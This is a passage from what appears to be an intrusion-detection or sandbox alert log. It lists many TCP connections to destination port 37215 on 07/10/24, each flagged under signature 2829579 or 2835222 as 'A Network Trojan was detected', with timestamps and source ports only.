                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102674
                  SID:2829579
                  Source Port:54576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822403
                  SID:2835222
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.403576
                  SID:2829579
                  Source Port:50992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.881228
                  SID:2835222
                  Source Port:42804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392323
                  SID:2829579
                  Source Port:54510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.840870
                  SID:2835222
                  Source Port:33214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.879601
                  SID:2835222
                  Source Port:47982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.797142
                  SID:2835222
                  Source Port:44072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.529956
                  SID:2835222
                  Source Port:39372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.832747
                  SID:2835222
                  Source Port:50758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.882242
                  SID:2835222
                  Source Port:46406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.915899
                  SID:2829579
                  Source Port:43016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.783807
                  SID:2829579
                  Source Port:47200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.213994
                  SID:2835222
                  Source Port:45800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.341408
                  SID:2835222
                  Source Port:55642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.973962
                  SID:2835222
                  Source Port:44206
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.891775
                  SID:2829579
                  Source Port:42004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.474983
                  SID:2835222
                  Source Port:34852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622607
                  SID:2829579
                  Source Port:47640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735406
                  SID:2829579
                  Source Port:60894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.239107
                  SID:2835222
                  Source Port:55900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.699578
                  SID:2829579
                  Source Port:44808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.132351
                  SID:2829579
                  Source Port:59550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.813463
                  SID:2829579
                  Source Port:43614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.408660
                  SID:2835222
                  Source Port:42136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583346
                  SID:2835222
                  Source Port:56298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.484037
                  SID:2829579
                  Source Port:42804
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.904364
                  SID:2835222
                  Source Port:54126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815715
                  SID:2829579
                  Source Port:43738
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.295536
                  SID:2835222
                  Source Port:50846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.924375
                  SID:2835222
                  Source Port:54356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.245667
                  SID:2835222
                  Source Port:35010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808084
                  SID:2829579
                  Source Port:34782
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.610191
                  SID:2835222
                  Source Port:56890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.815907
                  SID:2835222
                  Source Port:42788
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.405669
                  SID:2835222
                  Source Port:38732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.756816
                  SID:2835222
                  Source Port:60898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.100674
                  SID:2835222
                  Source Port:54802
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.007312
                  SID:2829579
                  Source Port:60026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.357682
                  SID:2829579
                  Source Port:51126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.278203
                  SID:2829579
                  Source Port:43668
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.051778
                  SID:2835222
                  Source Port:44522
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.956597
                  SID:2829579
                  Source Port:41492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.612875
                  SID:2835222
                  Source Port:36840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.273109
                  SID:2835222
                  Source Port:57710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.815715
                  SID:2829579
                  Source Port:60036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.380846
                  SID:2835222
                  Source Port:47478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.517419
                  SID:2835222
                  Source Port:51550
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.022558
                  SID:2829579
                  Source Port:35166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.152371
                  SID:2835222
                  Source Port:34300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.982292
                  SID:2835222
                  Source Port:57840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.805226
                  SID:2835222
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.325316
                  SID:2829579
                  Source Port:55938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.915095
                  SID:2829579
                  Source Port:60072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.408951
                  SID:2829579
                  Source Port:47472
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.494169
                  SID:2835222
                  Source Port:37958
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.746309
                  SID:2829579
                  Source Port:53670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.575243
                  SID:2829579
                  Source Port:59344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965193
                  SID:2835222
                  Source Port:42648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.076380
                  SID:2835222
                  Source Port:54486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.514704
                  SID:2835222
                  Source Port:41488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.890246
                  SID:2835222
                  Source Port:41848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.589872
                  SID:2835222
                  Source Port:51292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.781471
                  SID:2829579
                  Source Port:47384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.837661
                  SID:2829579
                  Source Port:35740
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.187114
                  SID:2835222
                  Source Port:34766
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.804667
                  SID:2835222
                  Source Port:59448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.961222
                  SID:2835222
                  Source Port:44850
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.793642
                  SID:2835222
                  Source Port:35002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.969981
                  SID:2829579
                  Source Port:33228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.585766
                  SID:2829579
                  Source Port:54298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.755062
                  SID:2829579
                  Source Port:48852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2835222
                  Source Port:39448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.975524
                  SID:2835222
                  Source Port:54194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.881765
                  SID:2835222
                  Source Port:45342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523896
                  SID:2829579
                  Source Port:51324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230941
                  SID:2829579
                  Source Port:48250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.528499
                  SID:2835222
                  Source Port:46952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.784131
                  SID:2829579
                  Source Port:48138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.897111
                  SID:2829579
                  Source Port:55882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.431217
                  SID:2829579
                  Source Port:49586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.430323
                  SID:2829579
                  Source Port:50012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.513767
                  SID:2829579
                  Source Port:46568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.507849
                  SID:2835222
                  Source Port:52692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.612080
                  SID:2835222
                  Source Port:52262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.133691
                  SID:2835222
                  Source Port:34582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.558738
                  SID:2829579
                  Source Port:51914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.102730
                  SID:2835222
                  Source Port:42688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.410234
                  SID:2829579
                  Source Port:56066
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.639187
                  SID:2829579
                  Source Port:44612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.169986
                  SID:2829579
                  Source Port:33106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.035789
                  SID:2829579
                  Source Port:52374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.773632
                  SID:2829579
                  Source Port:44326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.036814
                  SID:2835222
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.559180
                  SID:2829579
                  Source Port:39878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.173254
                  SID:2829579
                  Source Port:55602
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.463838
                  SID:2829579
                  Source Port:52326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.819532
                  SID:2829579
                  Source Port:33834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.667245
                  SID:2835222
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.828074
                  SID:2835222
                  Source Port:57354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.525645
                  SID:2829579
                  Source Port:33372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.389913
                  SID:2829579
                  Source Port:35852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.156506
                  SID:2835222
                  Source Port:57646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.275935
                  SID:2829579
                  Source Port:45170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.577116
                  SID:2835222
                  Source Port:50956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.075999
                  SID:2829579
                  Source Port:59746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2835222
                  Source Port:53756
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.054333
                  SID:2829579
                  Source Port:40510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.406012
                  SID:2835222
                  Source Port:33754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.965651
                  SID:2829579
                  Source Port:52214
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.681754
                  SID:2829579
                  Source Port:49824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:21.455167
                  SID:2829579
                  Source Port:50704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.987435
                  SID:2829579
                  Source Port:53134
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.198871
                  SID:2829579
                  Source Port:54962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.509281
                  SID:2829579
                  Source Port:39080
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.227018
                  SID:2835222
                  Source Port:41890
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853108
                  SID:2835222
                  Source Port:49304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.499422
                  SID:2835222
                  Source Port:48812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.128256
                  SID:2835222
                  Source Port:36184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.219271
                  SID:2829579
                  Source Port:43618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.217430
                  SID:2835222
                  Source Port:56848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.583346
                  SID:2835222
                  Source Port:33128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.873958
                  SID:2835222
                  Source Port:50334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.096498
                  SID:2829579
                  Source Port:41752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.043908
                  SID:2829579
                  Source Port:39516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.584785
                  SID:2829579
                  Source Port:60300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.287568
                  SID:2835222
                  Source Port:50810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.352800
                  SID:2835222
                  Source Port:35898
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.402379
                  SID:2829579
                  Source Port:41356
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.024186
                  SID:2835222
                  Source Port:41536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.707998
                  SID:2835222
                  Source Port:49468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.478959
                  SID:2829579
                  Source Port:48786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.747131
                  SID:2835222
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.188754
                  SID:2835222
                  Source Port:40684
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.663934
                  SID:2829579
                  Source Port:59330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.863602
                  SID:2835222
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.568062
                  SID:2829579
                  Source Port:34966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.268554
                  SID:2835222
                  Source Port:44928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.906290
                  SID:2835222
                  Source Port:41004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.657439
                  SID:2829579
                  Source Port:56500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.458086
                  SID:2829579
                  Source Port:50416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281156
                  SID:2835222
                  Source Port:36960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.518596
                  SID:2829579
                  Source Port:42002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.809850
                  SID:2835222
                  Source Port:50866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.392755
                  SID:2829579
                  Source Port:39326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.535069
                  SID:2829579
                  Source Port:33236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.248945
                  SID:2829579
                  Source Port:39314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.489272
                  SID:2829579
                  Source Port:47670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.598670
                  SID:2835222
                  Source Port:46908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.299402
                  SID:2835222
                  Source Port:47138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.180724
                  SID:2829579
                  Source Port:42374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.316362
                  SID:2829579
                  Source Port:56780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.934356
                  SID:2829579
                  Source Port:41582
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406451
                  SID:2829579
                  Source Port:46360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.147392
                  SID:2829579
                  Source Port:44394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.234090
                  SID:2835222
                  Source Port:52178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.175364
                  SID:2829579
                  Source Port:60444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.855166
                  SID:2829579
                  Source Port:40660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.826179
                  SID:2829579
                  Source Port:37258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.654674
                  SID:2835222
                  Source Port:37612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.835247
                  SID:2829579
                  Source Port:55176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.443386
                  SID:2835222
                  Source Port:41870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962060
                  SID:2829579
                  Source Port:48078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.120282
                  SID:2829579
                  Source Port:40856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.867804
                  SID:2835222
                  Source Port:52036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.370948
                  SID:2835222
                  Source Port:49362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.993743
                  SID:2829579
                  Source Port:53902
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.633588
                  SID:2835222
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.384907
                  SID:2829579
                  Source Port:50260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.956245
                  SID:2829579
                  Source Port:52330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.780604
                  SID:2835222
                  Source Port:45780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.501688
                  SID:2829579
                  Source Port:58662
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.308313
                  SID:2829579
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.108287
                  SID:2835222
                  Source Port:46026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.770002
                  SID:2835222
                  Source Port:47542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.227550
                  SID:2829579
                  Source Port:34928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.910333
                  SID:2829579
                  Source Port:41834
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.040867
                  SID:2829579
                  Source Port:41060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.255406
                  SID:2829579
                  Source Port:42076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.920658
                  SID:2835222
                  Source Port:44578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.008729
                  SID:2829579
                  Source Port:42062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.387027
                  SID:2829579
                  Source Port:60798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.848073
                  SID:2829579
